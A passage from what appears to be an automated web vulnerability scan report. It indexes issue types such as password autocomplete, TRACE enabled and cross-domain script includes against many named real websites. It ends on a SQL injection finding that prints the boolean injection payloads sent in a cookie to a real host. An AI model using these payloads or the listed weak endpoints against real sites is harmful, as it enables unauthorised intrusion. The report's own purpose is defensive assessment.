18.102. http://www.gartner.com/css/win/main.css

18.103. http://www.gartner.com/css/win/navigation.css

18.104. http://www.gartner.com/images/homepage/gartner80.gif

18.105. http://www.gartner.com/images/popup_logo_071201.gif

18.106. http://www.gartner.com/images/trans_pixel.gif

18.107. http://www.gartner.com/include/webtrends.jsp

18.108. http://www.gartner.com/it/css/g1_header_footer.css

18.109. http://www.gartner.com/it/images/homepage/gartner136.gif

18.110. http://www.gartner.com/it/include/g1_footer.js

18.111. http://www.gartner.com/js/cookie.js

18.112. http://www.gartner.com/js/layerapi.js

18.113. http://www.gartner.com/js/menu.js

18.114. http://www.gartner.com/js/mouseevents.js

18.115. http://www.gartner.com/js/navigation.js

18.116. http://www.gartner.com/js/optionsArray.jsp

18.117. http://www.gartner.com/js/regionalsText.js

18.118. http://www.gartner.com/js/unica/ntpagetag.js

18.119. http://www.gartner.com/js/utility.js

18.120. http://www.gartner.com/js/webtrendsCookies.js

18.121. http://www.gartner.com/pages/docs/gartner/mq/scripts/utils.js

18.122. https://www.gartner.com/login/loginInitAction.do

18.123. http://www.google.com/finance

18.124. https://www.google.com/accounts/ServiceLogin

18.125. http://www.hartfordbusiness.com/phpAds/adjs.php

18.126. http://www.hartfordbusiness.com/phpAds/www/delivery/lg.php

18.127. http://www.howardrice.com/

18.128. http://www.howardrice.com/6862

18.129. http://www.howardrice.com/Alumni

18.130. http://www.howardrice.com/Events

18.131. http://www.howardrice.com/WebResource.axd

18.132. http://www.howardrice.com/showlandingpage.aspx

18.133. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

18.134. http://www.moritthock.com/

18.135. http://www.moritthock.com/index.php

18.136. http://www.moritthock.com/index.php/attorneys

18.137. http://www.moritthock.com/index.php/attorneys/attorney/terese_l_arenth

18.138. http://www.moritthock.com/index.php/news_events/announcement/joshua_b._summers_elected_to_board_of_directors_of_the_jcc_of_the_greater_f

18.139. http://www.moritthock.com/index.php/news_events/press_releases

18.140. http://www.moritthock.com/index.php/news_events/television_media

18.141. http://www.moritthock.com/index.php/practice_areas

18.142. http://www.nytimes.com/2007/02/09/business/09legal.html

18.143. http://www.nytimes.com/2009/01/13/business/13bail.html

18.144. http://www.nytimes.com/2009/06/19/business/19scrushy.html

18.145. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html

18.146. http://www.orangecountyala.org/clubportal/memlogin.cfm

18.147. http://www.perkinscoie.com/

18.148. http://www.perkinscoie.com/AdvancedSearch.aspx

18.149. http://www.perkinscoie.com/FCWSite/abc.aspx

18.150. http://www.perkinscoie.com/events/eventslist.aspx

18.151. http://www.perkinscoie.com/firm/firm.aspx

18.152. http://www.perkinscoie.com/mquehrn/

18.153. http://www.perkinscoie.com/news/news_detail.aspx

18.154. http://www.perkinscoie.com/professionals/professionals.aspx

18.155. http://www.perkinscoie.com/professionals/professionals_detail.aspx

18.156. http://www.perkinscoie.com/professionals/professionals_results.aspx

18.157. http://www.perkinscoie.com/professionals/professionals_vcard.aspx

18.158. http://www.porterwright.com/

18.159. http://www.porterwright.com/404.aspx

18.160. http://www.porterwright.com/FCWSite/Include/spamproof.aspx

18.161. http://www.porterwright.com/aboutus/xpqGC.aspx

18.162. http://www.porterwright.com/careers/

18.163. http://www.porterwright.com/careers/xpqGC.aspx

18.164. http://www.porterwright.com/contactus/

18.165. http://www.porterwright.com/emailthispage/emdisclaimer.aspx

18.166. http://www.porterwright.com/favicon.ico

18.167. http://www.porterwright.com/government--regulatory-affairs-practice-areas/

18.168. http://www.porterwright.com/news/xpqNewsDetail.aspx

18.169. http://www.porterwright.com/people/

18.170. http://www.porterwright.com/professionals/xpqProfResults.aspx

18.171. http://www.porterwright.com/search/xpqSiteSearch.aspx

18.172. http://www.porterwright.com/services/

18.173. http://www.porterwright.com/services/xpqServiceDetail.aspx

18.174. http://www.porterwright.com/services/xpqServiceListPW.aspx

18.175. http://www.porterwright.com/styleBuilder.aspx

18.176. http://www.wendel.com/index.cfm

18.177. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

18.178. http://www.wi-ala.org/clubportal/loginretrieval.cfm

18.179. http://www.wi-ala.org/clubportal/memLogin.cfm

18.180. http://www.wi-ala.org/clubportal/memLoginExe.cfm

18.181. http://www.wi-ala.org/clubportal/wala/Page.cfm

19. Password field with autocomplete enabled

19.1. https://client.poynerspruill.com/Pages/Home.aspx

19.2. https://client.poynerspruill.com/pages/changepassword.aspx

19.3. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

19.4. https://www.gartner.com/login/loginInitAction.do

19.5. https://www.google.com/accounts/ServiceLogin

19.6. http://www.hartfordbusiness.com/news14300.html

19.7. http://www.hartfordbusiness.com/news14300.html

19.8. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

19.9. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

19.10. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

19.11. http://www.orangecountyala.org/clubportal/memlogin.cfm

19.12. http://www.pillsburylaw.com/

19.13. http://www.pillsburylaw.com/index.cfm

19.14. http://www.pillsburylaw.com/index.cfm

19.15. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

19.16. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

19.17. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

19.18. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

19.19. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

19.20. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

19.21. http://www.wi-ala.org/ClubPortal/wala/

19.22. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

19.23. http://www.wi-ala.org/clubportal/memLogin.cfm

19.24. http://www.wi-ala.org/clubportal/wala/Page.cfm

20. Source code disclosure

20.1. http://graphics8.nytimes.com/js/app/article/articleCommentCount.js

20.2. http://graphics8.nytimes.com/js2/lib/facebook/article/1.0/build.min.js

21. ASP.NET debugging enabled

21.1. http://www.ctlawtribune.com/Default.aspx

21.2. http://www.howardrice.com/Default.aspx

21.3. http://www.iimagazine.com/Default.aspx

22. Referer-dependent response

22.1. http://centrifugesystems.app101.hubspot.com/Inactive.aspx

22.2. http://www.hartfordbusiness.com/phpAds/adjs.php

22.3. http://www.sheehan.com/

22.4. http://www.wi-ala.org/clubportal/loginretrieval.cfm

23. Cross-domain POST

23.1. http://baxterhall.com/

23.2. http://www.rtacpa.com/

24. Cross-domain Referer leakage

24.1. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.2

24.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3

24.3. http://gigablast.com/

24.4. http://googleads.g.doubleclick.net/pagead/ads

24.5. http://layserfreiwald.com/attorneys.html

24.6. http://layserfreiwald.com/attorneys.html

24.7. http://www.bing.com/search

24.8. http://www.gartner.com/0_admin/PasswordRequest.jsp

24.9. http://www.gartner.com/technology/cio-priorities/ipad-business.jsp

24.10. http://www.gigablast.com/

24.11. http://www.google.com/search

24.12. http://www.google.com/search

24.13. http://www.google.com/search

24.14. http://www.google.com/search

24.15. http://www.google.com/search

24.16. http://www.google.com/search

24.17. http://www.google.com/search

24.18. http://www.google.com/search

24.19. http://www.google.com/search

24.20. http://www.google.com/search

24.21. http://www.google.com/search

24.22. http://www.google.com/search

24.23. http://www.google.com/search

24.24. http://www.google.com/search

24.25. http://www.google.com/search

24.26. http://www.google.com/search

24.27. http://www.google.com/search

24.28. http://www.google.com/search

24.29. http://www.google.com/search

24.30. http://www.google.com/search

24.31. http://www.google.com/search

24.32. http://www.google.com/search

24.33. http://www.ngelaw.com/news/event_detail.aspx

24.34. http://www.orangecountyala.org/clubportal/memlogin.cfm

24.35. http://www.perkinscoie.com/events/eventslist.aspx

24.36. http://www.perkinscoie.com/professionals/professionals_results.aspx

24.37. http://www.pomerantzlaw.com/cases.html

24.38. http://www.pomerantzlaw.com/practice-areas.html

24.39. http://www.stumbleupon.com/badge/embed/1/

24.40. http://www.tydingslaw.com/Content.aspx

24.41. http://www.wendel.com/index.cfm

24.42. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

24.43. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

24.44. http://www.wi-ala.org/clubportal/loginretrieval.cfm

24.45. http://www.wi-ala.org/clubportal/memLogin.cfm

24.46. http://www.wi-ala.org/clubportal/wala/Page.cfm

24.47. http://www.wiggin.com/showarea.aspx

25. Cross-domain script include

25.1. http://baxterhall.com/

25.2. http://googleads.g.doubleclick.net/pagead/ads

25.3. http://layserfreiwald.com/

25.4. http://layserfreiwald.com/attorneys.html

25.5. http://layserfreiwald.com/practice_areas/insurance_coverage_and_bad_faith.html

25.6. http://m.perkinscoie.com/

25.7. http://m.perkinscoie.com/practices/

25.8. http://m.perkinscoie.com/publications/

25.9. http://www.bloomberg.com/apps/news

25.10. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

25.11. http://www.centrifugesystems.com/

25.12. http://www.centrifugesystems.com/images/01_Home/ad_02/bg_Left.png

25.13. http://www.centrifugesystems.com/images/01_Home/ad_02/bg_Top.png

25.14. http://www.dmoc.com/contact

25.15. http://www.dmoc.com/practice

25.16. http://www.elawmarketing.com/about/clients

25.17. http://www.elawmarketing.com/about/staff

25.18. http://www.elawmarketing.com/portfolio

25.19. http://www.elawmarketing.com/portfolio/websites

25.20. http://www.elawmarketing.com/portfolio/websites/diserio-martin-oconnor-castiglioni-llp

25.21. http://www.elawmarketing.com/portfolio/websites/layser-freiwald

25.22. http://www.elawmarketing.com/portfolio/websites/los-angeles-chapter-association-legal-administrators

25.23. http://www.elawmarketing.com/portfolio/websites/orange-county-chapter-association-legal-administrators

25.24. http://www.elawmarketing.com/portfolio/websites/pomerantz-haudek-grossman-gross-llp

25.25. http://www.elawmarketing.com/portfolio/websites/rothman-consulting

25.26. http://www.elawmarketing.com/portfolio/websites/wisconsin-chapter-association-legal-administrators

25.27. http://www.fundingpost.com/breakfast/reg1.asp

25.28. http://www.gartner.com/technology/cio-priorities/ipad-business.jsp

25.29. http://www.gartner.com/technology/vendor-insights/procurement-sourcing-technology.jsp

25.30. http://www.glaala.org/clubportal/glaala/index.cfm

25.31. http://www.hartfordbusiness.com/news14300.html

25.32. http://www.howardrice.com/

25.33. http://www.howardrice.com/6862

25.34. http://www.howardrice.com/Alumni

25.35. http://www.howardrice.com/Events

25.36. http://www.letipli.com/member_details.asp

25.37. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

25.38. http://www.memberize.com/

25.39. http://www.njbiz.com/article.asp

25.40. http://www.nldhlaw.com/

25.41. http://www.nldhlaw.com/PracticeAreas/Employment-Law.asp

25.42. http://www.nldhlaw.com/PracticeAreas/Institutional-Litigation-and-Consulting.asp

25.43. http://www.nytimes.com/2007/02/09/business/09legal.html

25.44. http://www.nytimes.com/2009/01/13/business/13bail.html

25.45. http://www.nytimes.com/2009/06/19/business/19scrushy.html

25.46. http://www.nytimes.com/2010/08/22/sports/cycling/22armstrong.html

25.47. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible

25.48. http://www.orangecountyala.org/clubportal/memlogin.cfm

25.49. http://www.orangecountyala.org/clubportal/ocala/

25.50. http://www.perkinscoie.com/

25.51. http://www.perkinscoie.com/AdvancedSearch.aspx

25.52. http://www.perkinscoie.com/events/eventslist.aspx

25.53. http://www.perkinscoie.com/firm/firm.aspx

25.54. http://www.perkinscoie.com/mquehrn/

25.55. http://www.perkinscoie.com/news/news_detail.aspx

25.56. http://www.perkinscoie.com/professionals/professionals.aspx

25.57. http://www.perkinscoie.com/professionals/professionals_results.aspx

25.58. http://www.pomerantzlaw.com/cases.html

25.59. http://www.pomerantzlaw.com/contact-us.html

25.60. http://www.pomerantzlaw.com/institutional-investor-services/litigation-services-for-investors.html

25.61. http://www.pomerantzlaw.com/practice-areas.html

25.62. http://www.pomerantzlaw.com/the-firm/what-makes-pomerantz-unique.html

25.63. http://www.powelltrachtman.com/

25.64. http://www.powelltrachtman.com/CM/Custom/Case-Studies.asp

25.65. http://www.powelltrachtman.com/PracticeAreas/Employment-Claims-Labor-Relations.asp

25.66. http://www.poynerspruill.com/newsandevents/Pages/SignUpForAlerts.aspx

25.67. http://www.semmes.com/attorney_search.asp

25.68. http://www.semmes.com/contact/associate.asp

25.69. http://www.semmes.com/contact/default.asp

25.70. http://www.semmes.com/contactus.asp

25.71. http://www.semmes.com/offices/salisbury.asp

25.72. http://www.semmes.com/offices/virginia.asp

25.73. http://www.sleepertechnologies.com/

25.74. http://www.stumbleupon.com/badge/embed/1/

25.75. http://www.superlawyers.com/pennsylvania/lawyer/Glenn-A-Ellis/8480c83d-644a-4fd5-9e3b-15644c36fe5e.html

25.76. http://www.tydingslaw.com/

25.77. http://www.tydingslaw.com/ArticlesPublications.aspx

25.78. http://www.tydingslaw.com/Content.aspx

25.79. http://www.tydingslaw.com/OurAttorneys.aspx

25.80. http://www.tydingslaw.com/PracticesIndustries.aspx

25.81. http://www.tydingslaw.com/PracticesIndustries/Attorneys.aspx

25.82. http://www.tydingslaw.com/PracticesIndustries/pid/7/Commercial-and-Business-Litigation-.aspx

25.83. http://www.tydingslaw.com/SearchResults.aspx

25.84. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

25.85. http://www.vault.com/wps/portal/usa/companies/company-profile/Milbank,-Tweed,-Hadley-&-McCloy-LLP

25.86. http://www.vault.com/wps/portal/usa/companies/company-profile/Ober--Kaler--Grimes-&-Shriver

25.87. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

25.88. http://www.washingtonpost.com/wp-dyn/content/article/2009/06/17/AR2009061701900.html

25.89. http://www.wi-ala.org/ClubPortal/wala/

25.90. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

25.91. http://www.wi-ala.org/clubportal/loginretrieval.cfm

25.92. http://www.wi-ala.org/clubportal/memLogin.cfm

25.93. http://www.wi-ala.org/clubportal/wala/Page.cfm

26. TRACE method is enabled

26.1. http://ads.keypromedia.com/

26.2. http://attorney.findlaw.com/

26.3. http://c.statcounter.com/

26.4. http://capgroup.112.2o7.net/

26.5. http://d1.openx.org/

26.6. http://elawmarketing.com/

26.7. http://r.openx.net/

26.8. http://tracking.hubspot.com/

26.9. http://www.bisnow.com/

26.10. http://www.centrifugesystems.com/

26.11. http://www.dmoc.com/

26.12. http://www.elawmarketing.com/

26.13. http://www.forbes.com/

26.14. http://www.letipli.com/

26.15. http://www.milbanktweed.org/

26.16. http://www.nealgerber.com/

26.17. http://www.ngelaw.com/

26.18. http://www.njsba.com/

26.19. http://www.npr.org/

26.20. http://www.ober.com/

26.21. http://www.peckshaffer.com/

26.22. http://www.semmes.com/

26.23. http://www.sleepertechnologies.com/

26.24. http://www.stumbleupon.com/

26.25. http://www.superlawyers.com/

26.26. http://www.weblinedesigns.com/

27. Email addresses disclosed

27.1. http://baxterhall.com/

27.2. https://citrix.howardrice.com/Citrix/AccessPlatform/auth/login.aspx

27.3. https://client.poynerspruill.com/Pages/Home.aspx

27.4. http://imagesrv.gartner.com/media/jwplayer/flowplayer.ipad-3.2.1.js

27.5. http://layserfreiwald.com/

27.6. http://layserfreiwald.com/attorneys.html

27.7. http://layserfreiwald.com/attorneys.html

27.8. http://layserfreiwald.com/practice_areas/insurance_coverage_and_bad_faith.html

27.9. https://mail.howardrice.com/exchweb/bin/auth/owalogon.asp

27.10. http://www.capgroup.com/_js/s_code.js

27.11. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

27.12. http://www.fundingpost.com/breakfast/reg1.asp

27.13. http://www.glaala.org/clubportal/glaala/index.cfm

27.14. http://www.glaala.org/clubportal/js/date-picker.js

27.15. http://www.google.com/search

27.16. https://www.google.com/accounts/ServiceLogin

27.17. http://www.hartfordbusiness.com/fs_webkit/fs_toolbox.js

27.18. http://www.hartfordbusiness.com/fs_webkit/jquery/dimensions_1.1.2.js

27.19. http://www.hartfordbusiness.com/news14300.html

27.20. http://www.lawseminars.com/detail.php

27.21. http://www.mccarter.com/new/contactnew.aspx

27.22. http://www.mccarter.com/new/homenew.aspx

27.23. http://www.mccarter.com/new/privacynew.aspx

27.24. http://www.mccarter.com/new/showcareerpagenew.aspx

27.25. http://www.mccarter.com/new/showeventnew.aspx

27.26. http://www.milbank.com/en/Alumni/

27.27. http://www.milbank.com/en/NewsEvents/RecentPressRel/Milbank_Represents_Lenders_in_Financing_of_Two_40_MW_Hydropower_Plants_in_Chile.htm

27.28. http://www.moritthock.com/

27.29. http://www.moritthock.com/index.php

27.30. http://www.moritthock.com/index.php/attorneys

27.31. http://www.moritthock.com/index.php/attorneys/attorney/terese_l_arenth

27.32. http://www.ngelaw.com/attorney/bio.aspx

27.33. http://www.ngelaw.com/attorney/results.aspx

27.34. http://www.ngelaw.com/news/event_detail.aspx

27.35. http://www.ngelaw.com/news/events.aspx

27.36. http://www.ober.com/news_events/1329-nonprofit-community-groups-serving-baltimore-city-washington-dc-areas-eligible

27.37. http://www.ober.com/practices/32

27.38. http://www.ober.com/practices/55

27.39. http://www.ober.com/practices/intellectual-property

27.40. http://www.orangecountyala.org/clubportal/js/date-picker.js

27.41. http://www.peckshaffer.com/contact.php

27.42. http://www.perkinscoie.com/fcwsite/include/flowplayer/flowplayer.playlist-3.0.1.min.js

27.43. http://www.pillsburylaw.com/index.cfm

27.44. http://www.pomerantzlaw.com/cases.html

27.45. http://www.pomerantzlaw.com/contact-us.html

27.46. http://www.porterwright.com/careers/

27.47. http://www.powelltrachtman.com/Includes/clientcode/browserdetect.js

27.48. http://www.poynerspruill.com/newsandevents/Pages/Creditors%27Committees.aspx

27.49. http://www.poynerspruill.com/newsandevents/Pages/SignUpForAlerts.aspx

27.50. http://www.rtacpa.com/

27.51. http://www.semmes.com/contact/default.asp

27.52. http://www.semmes.com/contactus.asp

27.53. http://www.sheehan.com/news/articles/Dastin-Honored-with-David-P.-Goodwin-NeighborWorks--Outstanding-Neighbor-Award_497.aspx

27.54. http://www.sheehan.com/people/attorneys/Katherine-M.-Hanna.aspx

27.55. http://www.sleepertechnologies.com/

27.56. http://www.smithmazure.com/

27.57. http://www.smithmazure.com/attorney.asp

27.58. http://www.smithmazure.com/indus-manu.htm

27.59. http://www.smithmazure.com/news.asp

27.60. http://www.smithmazure.com/newsletters.asp

27.61. http://www.smithmazure.com/practice.asp

27.62. http://www.smithmazure.com/resources.asp

27.63. http://www.sutphinblvdbid.org/

27.64. http://www.tydingslaw.com/OurAttorneys.aspx

27.65. http://www.tydingslaw.com/PracticesIndustries/Attorneys.aspx

27.66. http://www.tydingslaw.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js

27.67. http://www.tydingslaw.com/Resources/Shared/scripts/widgets.js

27.68. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

27.69. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

27.70. http://www.wi-ala.org/ClubPortal/wala/NewsView.cfm

27.71. http://www.wi-ala.org/clubportal/js/date-picker.js

27.72. http://www.wi-ala.org/clubportal/loginretrieval.cfm

27.73. http://www.wi-ala.org/clubportal/wala/Page.cfm

27.74. http://www.wiggin.com/alumni.aspx

27.75. http://www.wiggin.com/bios.aspx

27.76. http://www.wiggin.com/showarea.aspx

28. Private IP addresses disclosed

29. Social security numbers disclosed

30. Credit card numbers disclosed

31. Robots.txt file

31.1. http://158-vdp-616.mktoresp.com/webevents/visitWebPage

31.2. http://ad.doubleclick.net/ad/N3282.nytimes.comSD6440/B3948326.5

31.3. http://ads.keypromedia.com/www/delivery/ajs.php

31.4. http://api.recaptcha.net/challenge

31.5. http://attorney.findlaw.com/b/ss/findlaw-12282,findlaw-global-v1,findlawfirmstaging/1/H.22.1/s35924329407941

31.6. http://b.scorecardresearch.com/b

31.7. http://c.statcounter.com/t.php

31.8. http://capgroup.112.2o7.net/b/ss/capgroupprod/1/H.15.1/s41646418426182

31.9. http://cspix.media6degrees.com/orbserv/hbpix

31.10. http://d1.openx.org/spcjs.php

31.11. http://ehg-findlaw.hitbox.com/HG

31.12. http://feeds.bbci.co.uk/news/rss.xml

31.13. http://gigablast.com/

31.14. http://googleads.g.doubleclick.net/pagead/ads

31.15. http://image.exct.net/aec5805b-4.jpg

31.16. http://imagesrv.gartner.com/css/TabbedPanels.css

31.17. http://l.addthiscdn.com/live/t00/250lo.gif

31.18. http://m.perkinscoie.com/

31.19. http://maps.google.com/maps

31.20. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

31.21. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

31.22. http://s7.addthis.com/js/250/addthis_widget.js

31.23. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY1YgDIOiIAyoHWcQAAP__ADIFVcQAAA8

31.24. http://safebrowsing.clients.google.com/safebrowsing/downloads

31.25. http://t2.gstatic.com/images

31.26. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

31.27. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php

31.28. http://www.bloomberg.com/apps/news

31.29. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

31.30. http://www.capgroup.com/

31.31. http://www.centrifugesystems.com/

31.32. http://www.chambersandpartners.com/europe/rankings36.aspx

31.33. http://www.cnbc.com/id/15840232

31.34. http://www.dmoc.com/

31.35. http://www.elawmarketing.com/about/staff

31.36. http://www.elfaonline.org/pub/news/indnews/news_report.cfm

31.37. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

31.38. http://www.freep.com/apps/pbcs.dll/article

31.39. http://www.ft.com/cms/s/0/fd2e0fcc-4a55-11de-8e7e-00144feabdc0.html

31.40. http://www.gartner.com/technology/home.jsp

31.41. https://www.gartner.com/login/loginInitAction.do

31.42. http://www.gigablast.com/

31.43. http://www.glaala.org/clubportal/glaala/index.cfm

31.44. http://www.goclubexe.com/clubportal

31.45. http://www.google-analytics.com/__utm.gif

31.46. http://www.google.com/search

31.47. https://www.google.com/accounts/ServiceLogin

31.48. http://www.hartfordbusiness.com/news14300.html

31.49. http://www.howardrice.com/

31.50. http://www.jdtplaw.com/

31.51. http://www.law.com/jsp/article.jsp

31.52. http://www.letipli.com/member_details.asp

31.53. http://www.linkedin.com/companies/peck-shaffer-&-williams

31.54. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx

31.55. http://www.memberize.com/

31.56. http://www.microsoft.com/ContentRedirect.asp

31.57. http://www.milbank.com/en

31.58. http://www.milbanktweed.org/GENERAL/Extranet.nsf/ClientLogin

31.59. http://www.njbiz.com/article.asp

31.60. http://www.nldhlaw.com/

31.61. http://www.npr.org/templates/story/story.php

31.62. http://www.nytimes.com/reuters/2009/11/30/arts/entertainment-us-golf-woods.html

31.63. http://www.orangecountyala.org/clubportal/ocala/

31.64. http://www.perkinscoie.com/

31.65. http://www.pillsburylaw.com/

31.66. https://www.pillsburylaw.com/index.cfm

31.67. http://www.porterwright.com/

31.68. http://www.powelltrachtman.com/

31.69. http://www.semmes.com/attorney_search.asp

31.70. http://www.sleepertechnologies.com/

31.71. http://www.stumbleupon.com/hostedbadge.php

31.72. http://www.superlawyers.com/redir

31.73. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

31.74. http://www.vault.com/wps/portal/usa/companies/company-profile/Perkins-Coie-LLP

31.75. http://www.washingtonpost.com/wp-dyn/content/article/2009/06/17/AR2009061701900.html

31.76. http://www.weblinedesigns.com/

31.77. http://www.wi-ala.org/ClubPortal/wala/

32. Cacheable HTTPS response

32.1. https://citrix.howardrice.com/Citrix/AccessPlatform/

32.2. https://client.poynerspruill.com/Pages/Home.aspx

32.3. https://client.poynerspruill.com/pages/changepassword.aspx

32.4. https://client.poynerspruill.com/pages/forgotpassword.aspx

32.5. https://www.gartner.com/favicon.ico

32.6. https://www.gartner.com/login/loginInitAction.do

33. Multiple content types specified

34. HTML does not specify charset

34.1. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.2

34.2. http://ad.doubleclick.net/adi/N3905.372584.HARTFORDBUSINESS.CO/B5470639.3

34.3. http://citrix.howardrice.com/

34.4. http://gigablast.com/addurl

34.5. http://gigablast.com/favicon.ico

34.6. http://gigablast.com/gsa.html

34.7. http://gigablast.com/prcts.html

34.8. http://gigablast.com/prdir.html

34.9. http://gigablast.com/search

34.10. http://timespeople.nytimes.com/packages/html/timespeople/xmlhttprequest.html

34.11. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html

34.12. http://www.gigablast.com/addurl

34.13. http://www.gigablast.com/search

34.14. http://www.google.com/recaptcha/api/image

34.15. http://www.jdtplaw.com/favicon.ico

34.16. http://www.mccarter.com/

34.17. http://www.moritthock.com/index.php

34.18. http://www.nldhlaw.com/favicon.ico

34.19. http://www.nytimes.com/adx/bin/adx_remote.html

34.20. http://www.nytimes.com/adx/bin/clientside/6d2cd6a9Q2FQ2AQ3CTxJQ22Q2F8qBs8xToxs8YQ2BYxhsBIQ2B

34.21. http://www.nytimes.com/facebook

34.22. http://www.nytimes.com/svc/timespeople/bell.html

34.23. http://www.powelltrachtman.com/favicon.ico

34.24. http://www.rothmanconsulting.com/favicon.ico

34.25. http://www.usatoday.com/money/autos/2009-04-20-gm-dealers-bankruptcy_N.htm

35. HTML uses unrecognised charset

35.1. http://gigablast.com/

35.2. http://www.gartner.com/0_admin/PasswordRequest.jsp

35.3. http://www.gartner.com/0_admin/TechnicalSupportPhone.jsp

35.4. http://www.gartner.com/include/webtrends.jsp

35.5. http://www.gigablast.com/

35.6. http://www.hartfordbusiness.com/news14300.html

36. Content type incorrectly stated

36.1. http://centrifugesystems.app101.hubspot.com/salog.js.aspx

36.2. http://gigablast.com/favicon.ico

36.3. http://image.exct.net/3aa0b01a-9.jpg

36.4. http://image.exct.net/66630590-4.jpg

36.5. http://image.exct.net/aec5805b-4.jpg

36.6. http://js.nyt.com/js/app/moth/moth.js

36.7. http://m.perkinscoie.com/FCWSite/img/mobile/read_more.png

36.8. http://m.perkinscoie.com/FCWSite/img/mobile/read_more_hover.png

36.9. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

36.10. http://pillsburylaw.app4.hubspot.com/salog.js.aspx

36.11. http://www.dmoc.com/favicon.ico

36.12. http://www.gartner.com/favicon.ico

36.13. http://www.gartner.com/include/webtrends.jsp

36.14. http://www.gartner.com/technology/include/metricsHelper.jsp

36.15. https://www.gartner.com/favicon.ico

36.16. http://www.glaala.org/clubportal/images/clubimages/194/vendors/wolfe_busby_logo.tiff

36.17. http://www.moritthock.com/index.php

36.18. http://www.nytimes.com/adx/bin/adx_remote.html

36.19. http://www.nytimes.com/adx/bin/clientside/6d2cd6a9Q2FQ2AQ3CTxJQ22Q2F8qBs8xToxs8YQ2BYxhsBIQ2B

36.20. http://www.nytimes.com/facebook

36.21. http://www.nytimes.com/svc/timespeople/bell.html

36.22. http://www.porterwright.com/files/ImageControl/df2c4f38-f32b-4661-95a3-f93deff66e3b/7483b893-e478-44a4-8fed-f49aa917d8cf/Presentation/Image/SitemapImage.jpg

36.23. http://www.stumbleupon.com/hostedbadge.php

36.24. http://www.wiggin.com/images/nav_recruiting.gif

37. Content type is not specified

37.1. https://client.poynerspruill.com/favicon.ico

37.2. http://gigablast.com/scripts/rollovers.js

37.3. http://labs.natpal.com/trk/lead

37.4. http://labs.natpal.com/trk/pixel

37.5. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx



1. SQL injection
There are 106 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ds.addthis.com/red/psi/sites/www.tydingslaw.com/p.json [dt cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.tydingslaw.com/p.json

Issue detail

The dt cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the dt cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

